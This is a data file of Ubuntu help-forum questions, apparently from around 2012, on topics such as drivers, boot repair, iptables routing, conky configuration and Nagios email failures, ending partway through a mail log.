192331	how to get an email notification when a usb storage device is inserted ?	we are running more than 600 ubuntu systems in our company . it is a data centre so we have certain policies . we have disabled the usage of storage devices in all the ubuntu systems . however we would like to configure email alerts . if someone inserts storage devices , we should get an email alert with subject as below , email alert : storage device found on ip : 172.29.35.18 note : where as for windows system , we have certain policies applied in our dc . so there is no problem with windows system . we need to receive alerts for ubuntu system also . any way to accomplish the above task would be great . update : few things i would like to clarify , if the user disconnects the network cable and if the user uses usb for data transfer ? i know that i wont get any intimations but later if they connect network is it possible to get those pending notifications ? ? some uses usb for charging their mobile phones , is it possible get email notifications for that also ? ?
192332	how to repair grub2 in a system with broken recovery mode ?	how to repair grub2 in a system with broken recovery mode
192340	ati graphics always on and runs in low-graphics mode	i use a lenovo y560 and has 12.04 and windows 7 installed . when i boot into ubuntu , i find that the ati car is always on which drains the battery and overheats the system is there any to switch off the ati graphics and use intel hd in ubuntu . ati hd 5730 is the graphics card that i use and it has switchable graphics in it . in bios the only two options for video adapter is discrete and switchable . after installing ati driver from amd website , i am getting a command prompt as log in screen . first error message comes as your system is running in low-graphics mode with options to : run in low graphics mode this time reconfigure exit with all three options i am stuck and need to manually reboot the system .
192350	trouble with installing everpad for lucid	i wanted to install everpad found in ppa ppa : nvbn-rm/ppa as written in http : //www.omgubuntu.co.uk/2012/09/use-evernote-in-ubuntu-with-everpad adding repo seems succesful : sudo add-apt-repository ppa : nvbn-rm/ppa executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret- keyring /etc/apt/secring.gpg -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver keyserver.ubuntu.com -- recv 01e7e3ede399a2252d12cd719a29122e9c8631ba gpg : requesting key 9c8631ba from hkp server keyserver.ubuntu.com gpg : key 9c8631ba : `` launchpad ppa for nvbn '' not changed gpg : total number processed : 1 gpg : unchanged : 1 but trying to install fails : sudo apt-get install everpad reading package lists ... done building dependency tree reading state information ... done e : could n't find package everpad is this a problem with the ppa or am i doing something wrong . any steps i could take to get clues on what might be going wrong ? thanks
192354	hp pavillion dm4 3011tx overheating	i have tried installing ubuntu 12.04 on my hp pavilion dm4 3011tx and after a few minutes the fans start to work very fast and my laptop starts to heat up ; the cpu temperature got up to 70 degrees and was still rising before i turned the computer off . i installed the graphics drivers for my amd raedon graphics and tried switching to the integrated graphics but that did n't make a difference i have also tried fedora and linux mint and they do the same thing . can anyone help ?
192360	wubi : ca n't get acces to data drive ( d : \ )	let me try to explain my situation . wubi installed on d : \ drive ( data drive ) . and it seems ok , but i ca n't get acces to my d drive from ubuntu ( only c : \ , recovery and boot are visible ) . any ideas how to fix it ?
192369	do i remember right that the dash had a start page with big icons ?	my dash start page worked perfectly for the first 2-3 months.. now it is exactly like this for about 2 months : bug ? should i report it ? is it already reported ? anyone else has the same problem ? description : ubuntu 12.04.1 lts release : 12.04 unity : installed : 5.14.0-0ubuntu1 candidate : 5.14.0-0ubuntu1
192372	configure run command in awesome window manager	i am using the awesome window manager - i like it . when i press mod+r i get the run command on the top left of the screen . here if i type in a command exactly correct it runs the application . how can i make the mod+r box smart ? example : if i press 'f ' and then 'up arrow ' it will auto search for applications ( or through my run history ) that begin with 'f ' ( like firefox ) .
192374	how can i disable the faded title text in the top panel ?	so i 'm new to linux but am basically blown away by ubuntu 12.04 and could definitely see this becoming my main desktop over time one small annoyance for me is a tendency for the global menu on the top bar to partially over-write the text description of the active window in the top panel . e.g . i focus on the `` ubuntu software centre '' window which writes out that label in the leftmost corner of the top menu bar . if i then move the cursor up to the top menu bar to access the `` file menu '' , this will partially overwrite the window name leaving just `` ubuntu '' visible . this is a little slice of ugliness i do n't want to see every day ! much easier on the eye for me would be to display the active window name at the centre of the top panel , using some of that free space and then have the global menu stay where it is , just to the right of the app launcher . i 've found a solution to disable the global menu but i would prefer to keep it and instead move ( or disable ) the active window name in the top panel . any way to do this ?
192375	i uninstalled ariya in kubuntu , how do i install it again ?	i have installed kubuntu 12.04 lts . by mistake , i removed default login screen ( ariya ) . it is now showing this message : can not login /user/shared/kde4/apps/kdm/themes/ariya now i am not able to login to previous gui . it is getting login in command line . how to resolve problem ?
192378	unable to install openjdk7 from terminal	when i tried to install jdk from following command : sudo apt-get install openjdk-7-jdk following error was displayed : err http : //us.archive.ubuntu.com/ubuntu/ precise-updates/universe openjdk-7-jre-lib all 7u7-2.3.2-1ubuntu0.12.04.1 404 not found [ ip : 91.189.91.15 80 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ?
192379	install joomla on nginx in ubuntu 12.04	i 'm installing joomla on nginx and so far everything is going fine until i get to the page where is checks pre-installation parameters . it says database support : no i 've already checked mysql installation and everything is fine . i have made a mysql database called `` joomladb '' . please help !
192381	how to turn off ati radeon hd 7730m ( on dell inspiron 7520 ) ?	i 'm new to linux , and i 've just installed ubuntu on my dell inspiron 15r special edition . the ati radeon hd 7730m is running by default , instead of the on-board intel hd graphics 4000 . i searched as much as possible on the internet and found no solution so far . i believe someone would help me here .
192385	clamd ping give error : initgroups ( ) failed ?	my ubuntu version is 12.04 . i have installed clamav as root user using the below commands . apt-get install clamav apt-get install clamav-daemon but when i use the below command clamd ping it gives below error message . error : initgroups ( ) failed am i missed anything ?
192389	ls-prepost 3.2 in ubuntu 12.04	i just switched from windows 7 to ubuntu 12.04 ( 64-bit ) and i would like to run a program called ls-prepost 3.2 in ubuntu . according to the documentation on their website there are several versions of 3.2 for linux ( centos , opensuse , sles ) but none for ubuntu , is there a way to install one of these and make it work ? then i was thinking about wine , which i have never used but heard people mention . so i was wondering , can i run the windows version of ls-prepost 3.2 in wine ? can you run all windows programs in wine or are there only specific programs you can run ? maybe there 's another solution that works better . in any case i appreciate the response .
192390	ubuntu - install mate desktop - themes missing ?	i just installed mate on top of ubuntu by the following commands : sudo add-apt-repository `` deb http : //packages.mate-desktop.org/repo/ubuntu oneiric main '' sudo apt-get update sudo apt-get install mate-archive-keyring sudo apt-get update sudo apt-get install mate-core sudo apt-get install mate-desktop-environment which caused no problems , but many things ( window theme , mint menu , ... ) are missing . it looks like : but it should look like : how can i install the missing packages ?
192393	access local ftp	i was using ubuntu 10.10 . i had a strange situation where i was setting up a small network all with fixed ips . i had a nas drive that i had enabled ftp on . when i used the connect to server menu i was able to connect fine ( or just entering in the url in nautilus ) . however from the command line the ftp command did n't work , and gave an unknown host error . i was able to ping the drive however . in the end i used the gvfs-host command to enable a scripted connection . i 'm just wondering if anyone has come across this problem how to fix this issue ?
192396	how do i install ia32-libs so i can run yworks diagrams in ubuntu 11.10 64bit ?	i 'm a beginner here . step by step near plain english would be appreciated if you have an answer . thanks
192401	where is the default tmux.conf file located ?	i want to copy the default tmux.conf file to my home directory , but i ca n't find the location in ubuntu 12.04 . the man page states that the file resides at /etc/tmux.conf however this does not match with my setup .
192402	my user ca n't upload files to folders owned by www-data	i think i have screwed up my permissions in ubuntu . i am using my server to run php . i recently ran across a problem where php could not create directories in the var/www-directory , so i searched around on the internet . now php can write and access anything like it should , but as a user , i ca n't create new folders or files anymore . right now , the permissions for folders are like this : drwxrwsr-x 2 www-data www-data [ folders ] this is the permissions when i upload using sftp : -rw-rw-r -- 1 gautvedt www-data [ folders ] what have i done wrong and how can i change this ?
192409	ca n't access wireless network in ubuntu 12.04	i 've just installed ubuntu on a laptop that came with windows 7 pre-installed . in windows 7 i was able to connect to the same wireless network that the other computers in my house are connected to but i ca n't do so in ubuntu . when i open network through system settings i do n't have a wireless option , the only two options i have are wired and network proxy . i 'm trying wireless troubleshooting on help.ubuntu and apparently the driver is unclaimed . how can i fix this ?
192412	upgrade to precise leaving system unbootable	i 've upgraded our server 's system from lucid to precise and as far as i can tell , it left the system in an un-bootable state . i 've read many responses in different threads but my problem has a twist . when we boot the server , it says the disc drive for / is not ready yet or not present continue to wait ; or press s to skip mounting or m for manual recovery but when i press any of those buttons , it does n't do anything . i ca n't boot to any recovery console , and as it is a server and i 'm accessing it via idrac , there 's not much i can do .
192414	lubuntu 12.04 installation trouble	i have i problem ! i ca n't install the lubuntu 12.04 on my old pc . i only get to the point where i have entered all the needed information ( hard drive , username , password etc ) . when the installation wizard is starting to copy files from the cd to the hard drive , i get after about one minute a blank sreen with only themouse cursor ! i can move the mouse cursor but the whole procegure is stoped ! nothing happens after that ! my pc : compaq pressario 7000 pentium iii 933 mhz 768 mb ram any idea how to solve it ? ? thanks ! ! !
192419	how to send packets via a pptp vpn tunnel ?	i 'm trying to send certain port traffic through my ppp0 interface it 's a pptp vpn tunnel , first , i 'm using a wireless usb interface , i connect up to my access point , then i initiate my vpn , there is a connection but i do not channel all connexions through that , nor do i want to , so , say i want to channel all port 80 packets through my vpn ( interface dev ppp0 ) . i first run : iptables -t mangle -a output -p tcp -- dport 80 -j mark -- set-mark 0xa to mark the correct packets then i add a table named vpn_table , i then add ip route add default dev ppp0 table vpn_table when i do that traffic begins to dribble through the ppp0 , but no pages load . i supose i must have caused some sort of coflict , or the route i 'm adding in vpn_table is n't quite right . i 'm not sure , i think i 'm marking the packets correctly but i ca n't be sure of that either . update : i think i 've got part of the issue solved : running tcpdump -i ppp0 showed me that indeed there was outgoing requests via ppp0 , now , there is never a response , and pages do not load with using that interface..i 'm still missing something .
192424	do unity webapps work in google chrome ?	i 'm using the latest stable chrome for linux built from google and i just installed the unity webapps preview . unfortunately i ca n't figure out how to set it up . in tutorials i read that unity should ask me by itself to integrate a web app as soon as i use it . this does not seem to happen . i only saw it working with firefox in video , though . is google chrome supported ?
192425	installing skype on 12.04 64 bit causes errors	possible duplicates : unable to install skype on 64bit ubuntu fixing broken packages hi there i am trying to install skype through apt-get but i am having some trouble . the skype package depends on skype-bin which is not found in my list of packages . so when trying to install skype i get the following error . $ sudo apt-get install skype reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : skype : depends : skype-bin but it is not installable e : unable to correct problems , you have held broken packages . does anyone know why this might happen ? am i missing a repository ? i get similar results when downloading the .deb from their site . but it complains about ai32-libs not being installable . this is because it depends on another package that does not exist in my list . please bear in mind that this is a custom install from the company i work for . they have secured it and i think they have updated it over time and skipped versions , possibly breaking things .
192426	a problem with conky in gnome 3.4	my conky in gnome 3.4 is not working . when i run a conky script nothing appears but the process is running . please also see the debug code : pungi-man @ pungi-man : ~ $ sh conky_startup.sh conky : forked to background , pid is 3157 conky : desktop window ( c00023 ) is subwindow of root window ( aa ) conky : window type - override conky : drawing to created window ( 0x2200001 ) conky : drawing to double buffer my conky script is : background yes update_interval 1 cpu_avg_samples 2 net_avg_samples 2 temperature_unit celsius double_buffer yes no_buffers yes text_buffer_size 2048 gap_x 10 gap_y 30 minimum_size 190 450 maximum_width 190 own_window yes own_window_type override own_window_transparent yes own_window_hints undecorate , sticky , skip_taskbar , skip_pager , below border_inner_margin 0 border_outer_margin 0 alignment tr draw_shades no draw_outline no draw_borders no draw_graph_borders no override_utf8_locale yes use_xft yes xftfont caviar dreams : size=8 xftalpha 0.5 uppercase no default_color ffffff color1 dddddd color2 aaaaaa color3 888888 color4 666666 lua_load /home/pungi-man/.conky/conky_grey.lua lua_draw_hook_post main text $ { voffset 35 } $ { goto 95 } $ { color4 } $ { font ubuntu : size=22 } $ { time % e } $ { color1 } $ { offset -50 } $ { font ubuntu : size=10 } $ { time % a } $ { goto 85 } $ { color2 } $ { voffset -2 } $ { font ubuntu : size=9 } $ { time % b } $ { voffset -2 } $ { color3 } $ { font ubuntu : size=12 } $ { time % y } $ { font } $ { voffset 80 } $ { goto 90 } $ { font ubuntu : size=7 , weight : bold } $ { color } cpu $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { top name 1 } $ { alignr } $ { top cpu 1 } % $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color2 } $ { top name 2 } $ { alignr } $ { top cpu 2 } % $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color3 } $ { top name 3 } $ { alignr } $ { top cpu 3 } % $ { goto 90 } $ { cpugraph 10,100 666666 666666 } $ { goto 90 } $ { voffset -10 } $ { font ubuntu : size=7 , weight : normal } $ { color } $ { threads } process $ { voffset 20 } $ { goto 90 } $ { font ubuntu : size=7 , weight : bold } $ { color } mem $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { top_mem name 1 } $ { alignr } $ { top_mem mem 1 } % $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color2 } $ { top_mem name 2 } $ { alignr } $ { top_mem mem 2 } % $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color3 } $ { top_mem name 3 } $ { alignr } $ { top_mem mem 3 } % $ { voffset 15 } $ { goto 90 } $ { font ubuntu : size=7 , weight : bold } $ { color } disks $ { goto 90 } $ { diskiograph 30,100 666666 666666 } $ { voffset -30 } $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color } used : $ { fs_used /home } /home $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color } used : $ { fs_used / } / $ { voffset 10 } $ { goto 70 } $ { font ubuntu : size=18 , weight : bold } $ { color3 } net $ { alignr } $ { color2 } $ { font ubuntu : size=7 , weight : bold } $ { color1 } $ { if_up eth0 } eth $ { addr eth0 } $ { endif } $ { if_up wlan0 } wifi $ { addr wlan0 } $ { endif } $ { goto 90 } $ { font ubuntu : size=7 , weight : bold } $ { color } open ports : $ { alignr } $ { color2 } $ { tcp_portmon 1 65535 count } $ { goto 90 } $ { font ubuntu : size=7 , weight : bold } $ { color } $ { offset 10 } ip $ { alignr } dport $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { tcp_portmon 1 65535 rip 0 } $ { alignr 1 } $ { tcp_portmon 1 65535 rport 0 } $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { tcp_portmon 1 65535 rip 1 } $ { alignr 1 } $ { tcp_portmon 1 65535 rport 1 } $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { tcp_portmon 1 65535 rip 2 } $ { alignr 1 } $ { tcp_portmon 1 65535 rport 2 } $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { tcp_portmon 1 65535 rip 3 } $ { alignr 1 } $ { tcp_portmon 1 65535 rport 3 } $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { tcp_portmon 1 65535 rip 4 } $ { alignr 1 } $ { tcp_portmon 1 65535 rport 4 } $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { tcp_portmon 1 65535 rip 5 } $ { alignr 1 } $ { tcp_portmon 1 65535 rport 5 } $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { tcp_portmon 1 65535 rip 6 } $ { alignr 1 } $ { tcp_portmon 1 65535 rport 6 } $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { tcp_portmon 1 65535 rip 7 } $ { alignr 1 } $ { tcp_portmon 1 65535 rport 7 } $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { tcp_portmon 1 65535 rip 8 } $ { alignr 1 } $ { tcp_portmon 1 65535 rport 8 } $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { tcp_portmon 1 65535 rip 9 } $ { alignr 1 } $ { tcp_portmon 1 65535 rport 9 } $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { tcp_portmon 1 65535 rip 10 } $ { alignr 1 } $ { tcp_portmon 1 65535 rport 10 } $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { tcp_portmon 1 65535 rip 11 } $ { alignr 1 } $ { tcp_portmon 1 65535 rport 11 } $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { tcp_portmon 1 65535 rip 12 } $ { alignr 1 } $ { tcp_portmon 1 65535 rport 12 } $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { tcp_portmon 1 65535 rip 13 } $ { alignr 1 } $ { tcp_portmon 1 65535 rport 13 } $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { tcp_portmon 1 65535 rip 14 } $ { alignr 1 } $ { tcp_portmon 1 65535 rport 14 } this script works fine with unity but faces problems in gnome 3.4 can anyone please sort it out ?
192432	how to start graphical applications without lightdm running ?	recently i had deactivated lightdm since i do n't want the desktop environment running and consuming ram . to accomplish that i had override the lightdm by creating the file : # echo `` manual '' > /etc/init/lightdm.override i would like to open some applications like firefox ... and writter and other ! .. but it keeps giving an error : error : ca n't open display : localhost:0.0 can anyone help ? tkx in advance
192438	gui crashed when updating 10.04 to 12.04 using the update-manager	i was updating my desktop from 10.04 to 12.04 and the server crashed before the update was done is there any way to fix this other than reinstalling the os . if not is there a way that i can back up by raid configuration , apache , php , sql , python , ethernet connection , cron jobs , samba , ldap , etc . and other useful apps , export a list of all of the things i have installed and config files automatically ?
192440	airmon-ng command not found	in the terminal i get command not found when i type : airmon-ng start wlan0 what can i do to access the airmon-ng command ?
192444	kernel missing after update , reappears after using live usb	i run 12.04 on a asus laptop that 's about 3+ years old , that has a bad battery . ( requires constant ac power . ) i recently did an update that included a kernel . i ran the update and rebooted , and for some reason , grub could n't find the kernel , and i was stuck there for awhile . being a relatively inexperienced linux user , i decided to load my live usb , copy over files i wanted to keep , and reinstall . mid-copy , i bumped my power cable and unplugged the computer . when i booted back up , it loaded my hard disk install without problem . why did this happen in the first place , what fixed it , and how can i avoid this problem in the future ?
192449	cp file in many subdirectories with *	i want to copy a file `` test.sh '' in directories which have all a subdirectory 2_bas ( ex . prod1/2_bas , prod2/2_bas , etc ... ) i tried : cp test */2_bas/ but i get the error message : cp : omitting directory `prod1/2_bas' cp : omitting directory `prod2/2_bas ' a solution would be : for dir in * ; do [ -d `` $ dir '' ] & & cp test.sh `` $ dir '' /2_bas ; done but why does the first strategy not work ?
192452	problem installing nvidia driver on lenovo z570	i have a lenovo z570 , i found out that my laptop has two graphic card ( intel + nvidia ) . when i tried to install nvidia driver , i 've got an error which says : the graphics driver could not find compatible graphics hardware . what should i do to fix it ? does it mean my laptop really does n't have that hardware ?
192454	how to know what had done on my computer ?	sometimes other users on my computer use my account . i want to know what did they do on in easy way with gui . i dont want to read logs and such things . are there such tools ? if yes , please names .
192456	which logs will tell me about the touchpad and keyboard locking up ?	i have an asus n53sm laptop that i leave running for several weeks at a time . i never put it in hibernate or suspend , i only close the lid when i 'm not using it . after a few days or weeks of running , the touchpad and keyboard will both lock up ( at the same time ) for no apparent reason . i could be just surfing the internet when it happens . the touchpad and keyboard seem to only lock up when i 'm actively using the laptop ( not when idle ) , which may mean it 's related to something i press , but i 'm not sure ? the touchpad never locks or unlocks when pressing fn and the designated touchpad lock key ( it does not seem to work on linux ) . while the touchpad and keyboard are locked , i am able to plug in my usb mouse and successfully use it to control the screen cursor . i can also remotely get into the system with vnc and ssh , everything seems to run fine there as well . no processes appear out of control . it 's just the laptops physical touchpad and keyboard that are locking up . how might i go about diagnosing this problem ? what system logs to look at ? ( anything specific to look for in them ? ) perhaps i should try reloading some modules ? any thing else i should inspect ?
192460	how can i enable my asus xonar dgx ( cmi8788 chipset ) sound card ?	i have been strugling with trying to get my sound card working under linux , from the command line it reports back as follows : user @ desktop : ~ $ sudo lspci -v | grep -a7 -i `` audio '' 84:04.0 multimedia audio controller : c-media electronics inc cmi8788 [ oxygen hd audio ] subsystem : asustek computer inc. device 8521 flags : bus master , medium devsel , latency 64 , irq 11 i/o ports at f000 [ size=256 ] capabilities : [ c0 ] power management version 2 user @ desktop : ~ $ lshw -c sound warning : you should run this program as super-user . *-multimedia unclaimed description : multimedia audio controller product : cmi8788 [ oxygen hd audio ] vendor : c-media electronics inc physical id : 4 bus info : pci @ 0000:84:04.0 version : 00 width : 32 bits clock : 33mhz capabilities : bus_master cap_list configuration : latency=64 maxlatency=24 mingnt=2 resources : ioport : f000 ( size=256 ) *-multimedia description : audio device product : barts hdmi audio [ radeon hd 6800 series ] vendor : hynix semiconductor ( hyundai electronics ) physical id : 0.1 bus info : pci @ 0000:85:00.1 version : 00 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:384 memory : fbe40000-fbe43fff checking around a bit i find that while the system seems to recognize it , alsa does not seem to be recognizing it as an audio device . i 've already tried to recompile the relevent modules and i 'm still not having much luck . also , it appears that based upon the version and kernel it should have been good to go out of the box so why it is not working is a bit of a mystery . user @ desktop : ~ $ cat /etc/issue ubuntu 12.04.1 lts \n \l user @ desktops : ~ $ cat /etc/lsb-release distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.1 lts '' user @ desktop : ~ $ uname -r 3.2.0-31-generic user @ desktop : /proc/asound $ cat version advanced linux sound architecture driver version 1.0.24 . the snd-oxygen module appears to be loading correclty and sudo modinfo snd-oxygen reports the following : user @ desktop : ~ $ sudo modinfo snd-oxygen filename : /lib/modules/3.2.0-31-generic/kernel/sound/pci/oxygen/snd-oxygen.ko license : gpl v2 description : c-media cmi8788 driver author : clemens ladisch < clemens @ ladisch.de > srcversion : 396d66c73afe20afaf981b5 alias : pci : v000013f6d00008788sv00007284sd00009781bc*sc*i* alias : pci : v000013f6d00008788sv00007284sd00009761bc*sc*i* alias : pci : v000013f6d00008788sv00005431sd0000017abc*sc*i* alias : pci : v000013f6d00008788sv0000415asd00005431bc*sc*i* alias : pci : v000013f6d00008788sv000014c3sd00001711bc*sc*i* alias : pci : v000013f6d00008788sv000014c3sd00001710bc*sc*i* alias : pci : v000013f6d00008788sv000013f6sd0000ffffbc*sc*i* alias : pci : v000013f6d00008788sv000013f6sd00008782bc*sc*i* alias : pci : v000013f6d00008788sv00001043sd00008467bc*sc*i* alias : pci : v000013f6d00008788sv00001a58sd00000910bc*sc*i* alias : pci : v000013f6d00008788sv0000147asd0000a017bc*sc*i* alias : pci : v000013f6d00008788sv000013f6sd00008788bc*sc*i* alias : pci : v000013f6d00008788sv000013f6sd00000010bc*sc*i* alias : pci : v000013f6d00008788sv000013f6sd00000001bc*sc*i* alias : pci : v000013f6d00008788sv000010b0sd00000219bc*sc*i* alias : pci : v000013f6d00008788sv000010b0sd00000218bc*sc*i* alias : pci : v000013f6d00008788sv000010b0sd00000217bc*sc*i* alias : pci : v000013f6d00008788sv000010b0sd00000216bc*sc*i* depends : snd-oxygen-lib , snd intree : y vermagic : 3.2.0-31-generic smp mod_unload modversions parm : index : card index ( array of int ) parm : id : id string ( array of charp ) parm : enable : enable card ( array of bool )
192461	how do i get ubuntu server to recognize and automount a hotplugged sata drive ?	ahci is on and i can manually mount but as this device is destined to be a headless device used by people with no clue about the terminal so i need something as idiotproof as possible . i expect i need to make some udev rules but i 've got no idea how to start . i 've managed to get it to automount using fstab but this is unsuitable for hotplugging . for now all i need is for it to recognize a particular drive with one primary ntfs partition but i 'll be ramping this up to include a bunch of drives and even 'never seen by the server before ' drives so if there 's someone can also help me with that then even better .
192464	ubuntu 12.04 slows down while installing updates or using software center	i have installed ubuntu 12.04 inside windows 7 , and love to try it , but i do n't know why it slows down and windows become grey while installing updates or using software center and that causes `` un disfonctionnement total '' of all system can i find how to ride over this ?
192469	why does n't chromium updates itself to the latest version , like google chrome does ?	google chrome , the chromium release line google maintains itself , comes with automatic updating in the background . however , while the google chrome stable channel for linux ( visit from a linux machine to get the linux download ) currently has version 22 , the chromium release in the ubuntu software center only has version 20 . even after using it for a while , it does not update itself to the latest version . i thought chromium should update itself to the latest dev or beta channel version , but it does n't even reach the stable channel version , why is this ? is there a way to update chromium yourself ? i ca n't find a `` check for updates '' function in the settings menu .
192476	redirect requests mapped to a dns ip address	for this command lines : sysctl net.ipv4.ip_forward=1 iptables -t nat -a prerouting -p tcp -- dport port -j dnat -- to-destination ip : port iptables -t nat -a postrouting -j masquerade i can reroute to ip : port but how do i use a dns instead ? for example : -- to-destination mynetwork.dyndns.com:80
192477	how do i create a .desktop file for a .jar file ?	my problem is , that i do want to create a .desktop file for technic launcher , which is an alternative launcher for minecraft . it comes in the form of a .jar file and i want to create a menu entry for it . how would i write such a .desktop file ? my attempt was the following : [ desktop entry ] type=application name=technic launcher comment=minecraft launcher for technic pack , tekkit , hack/mine and yogbox exec=/home/benjamin/applications/minecraft/techniclauchner/technic-launcher-latest.jar icon=/home/benjamin/applications/minecraft/techniclauchner/icon.png terminal=false categories=game ; actiongame ; adventuregame ; roleplaying ; this did n't work , hence my question . what did i do wrong ? is it even possible to point to a .jar file ?
192479	grep through subdirectories	add a string to a text file from terminal i 've been looking at this thread . the solution ( number 2 , with ls grep ) works perfectly for files called .txt in the current directory . how about if i wanted to search through a directory and the subdirectories ? for example , i have to search through a directory that has many subdirectories , and they have many subdirectories etc . i 'm new to linux sorry , so i 'm not sure if this is the right place
192497	replacing nautilus with awesome windows manager on 12.04	just like the title suggests , any idea on replacing nautilus with awesome wm ?
192498	installation problems after broken installation of desktop4shared	ranjith @ nkr : ~ $ sudo apt-get install desktop4shared-1.3_1-all reading package lists ... done building dependency tree reading state information ... done e : the package desktop4shared needs to be reinstalled , but i ca n't find an archive for it . i can not install any software after the broken installation of desktop4shared . how can i reinstall the software ?
192500	grub missing after upgrade to 12.04 ( only blinking underscore on boot )	i recently upgraded to 12.04 . after booting , i only got the grub shell with no kernels loaded . i tried running boot-repair . it told me i use gpt and would need to create a new grub-boot partition . i did this and ran boot-repair again successfully . however , i now get only a blinking underscore on boot and do n't even get a grub shell . any ideas ? i notice that my new gpt bios boot partition is n't the first partition . can i make it first without having to reformat the first partition that contains all my data ? boot repair output here .
192502	problem with nagios email notification	recently i am not getting any email notification in nagios . i have tested it by sending emails manually from root user and nagios user and i have got the email successfully . but i am not any email alerts in case any issue so that i tested it by sending custom host notification from webui , something seems to be wrong in the log . i hope someone can help me . please find the logs below : from nagios frontend webui : ( tested it by sending custom host notification ) sep 24 20:43:00 ubuntubackup-chennai sendmail [ 5923 ] : q8ofd0bp005923 : authentication-warning : localhost.localdomain : nagios set sender to nagiosub @ ****.com using -r sep 24 20:43:00 ubuntubackup-chennai sendmail [ 5923 ] : q8ofd0bp005923 : from=nagiosub @ ****.com , size=436 , class=0 , nrcpts=1 , msgid= < 5060787c.cbqwumyq0g8h5/8r % nagiosub @ ****.com > , relay=nagios @ localhost sep 24 20:43:00 ubuntubackup-chennai sendmail [ 5924 ] : q8ofd0jv005924 : < $ @ localhost.localdomain > ... user unknown sep 24 20:43:00 ubuntubackup-chennai sendmail [ 5923 ] : q8ofd0bp005923 : to= $ , ctladdr=nagiosub @ ****.com ( 496/492 ) , delay=00:00:00 , xdelay=00:00:00 , mailer=relay , pri=30436 , relay= [ 127.0.0.1 ] [ 127.0.0.1 ] , dsn=5.1.1 , stat=user unknown sep 24 20:43:00 ubuntubackup-chennai sendmail [ 5924 ] : q8ofd0jv005924 : from= < nagiosub @ ****.com > , size=436 , class=0 , nrcpts=0 , proto=esmtp , daemon=mta , relay=localhost.localdomain [ 127.0.0.1 ] sep 24 20:43:00 ubuntubackup-chennai sendmail [ 5923 ] : q8ofd0bp005923 : q8ofd0bq005923 : dsn : user unknown sep 24 20:43:01 ubuntubackup-chennai sendmail [ 5924 ] : q8ofd0jx005924 : from= < > , size=2374 , class=0 , nrcpts=1 , msgid= < 201209241513.q8ofd0bq005923 @ localhost.localdomain > , proto=esmtp , daemon=mta , relay=localhost.localdomain [ 127.0.0.1 ] sep 24 20:43:01 ubuntubackup-chennai sendmail [ 5923 ] : q8ofd0bq005923 : to=nagiosub @ ****.com , delay=00:00:01 , xdelay=00:00:01 , mailer=relay , pri=31460 , relay= [ 127.0.0.1 ] [ 127.0.0.1 ] , dsn=2.0.0 , stat=sent ( q8ofd0jx005924 message accepted for delivery ) sep 24 20:43:02 ubuntubackup-chennai sendmail [ 5926 ] : q8ofd0jx005924 : to= < nagiosub @ **** > , delay=00:00:02 , xdelay=00:00:01 , mailer=relay , pri=122374 , relay=smtp10.netcore.co.in . [ 202.162.229.32 ] , dsn=2.0.0 , stat=sent ( _smr_smtp12.netcore.co.in ok : queued as 0797e19957 ) as nagios user from terminal : sep 24 20:44:04 ubuntubackup-chennai sendmail [ 6067 ] : q8ofe4th006067 : authentication-warning : localhost.localdomain : nagios set sender to nagiosub @ ****.com using -r sep 24 20:44:04 ubuntubackup-chennai sendmail [ 6067 ] : q8ofe4th006067 : from=nagiosub @ ****.com , size=341 , class=0 , nrcpts=1 , msgid= < 506078bc.5x+q5x78h8wjvw2j % nagiosub @ ****.com > , relay=nagios @ localhost sep 24 20:44:04 ubuntubackup-chennai sendmail [ 6068 ] : q8ofe4wn006068 : from= < nagiosub @ ****.com > , size=614 , class=0 , nrcpts=1 , msgid= < 506078bc.5x+q5x78h8wjvw2j % nagiosub @ **** > , proto=esmtp , daemon=mta , relay=localhost.localdomain [ 127.0.0.1 ] sep 24 20:44:05 ubuntubackup-chennai sendmail [ 6067 ] : q8ofe4th006067 : to=karthick @ ****.com , ctladdr=nagiosub @ **** ( 496/492 ) , delay=00:00:01 , xdelay=00:00:01 , mailer=relay , pri=30341 , relay= [ 127.0.0.1 ] [ 127.0.0.1 ] , dsn=2.0.0 , stat=sent ( q8ofe4wn006068 message accepted for delivery ) sep 24 20:44:05 ubuntubackup-chennai sendmail [ 6070 ] : q8ofe4wn006068 : to= < karthick @ ****.com > , delay=00:00:01 , xdelay=00:00:00 , mailer=relay , pri=120614 , relay=smtp10.netcore.co.in . [ 202.162.229.32 ] , dsn=2.0.0 , stat=sent ( 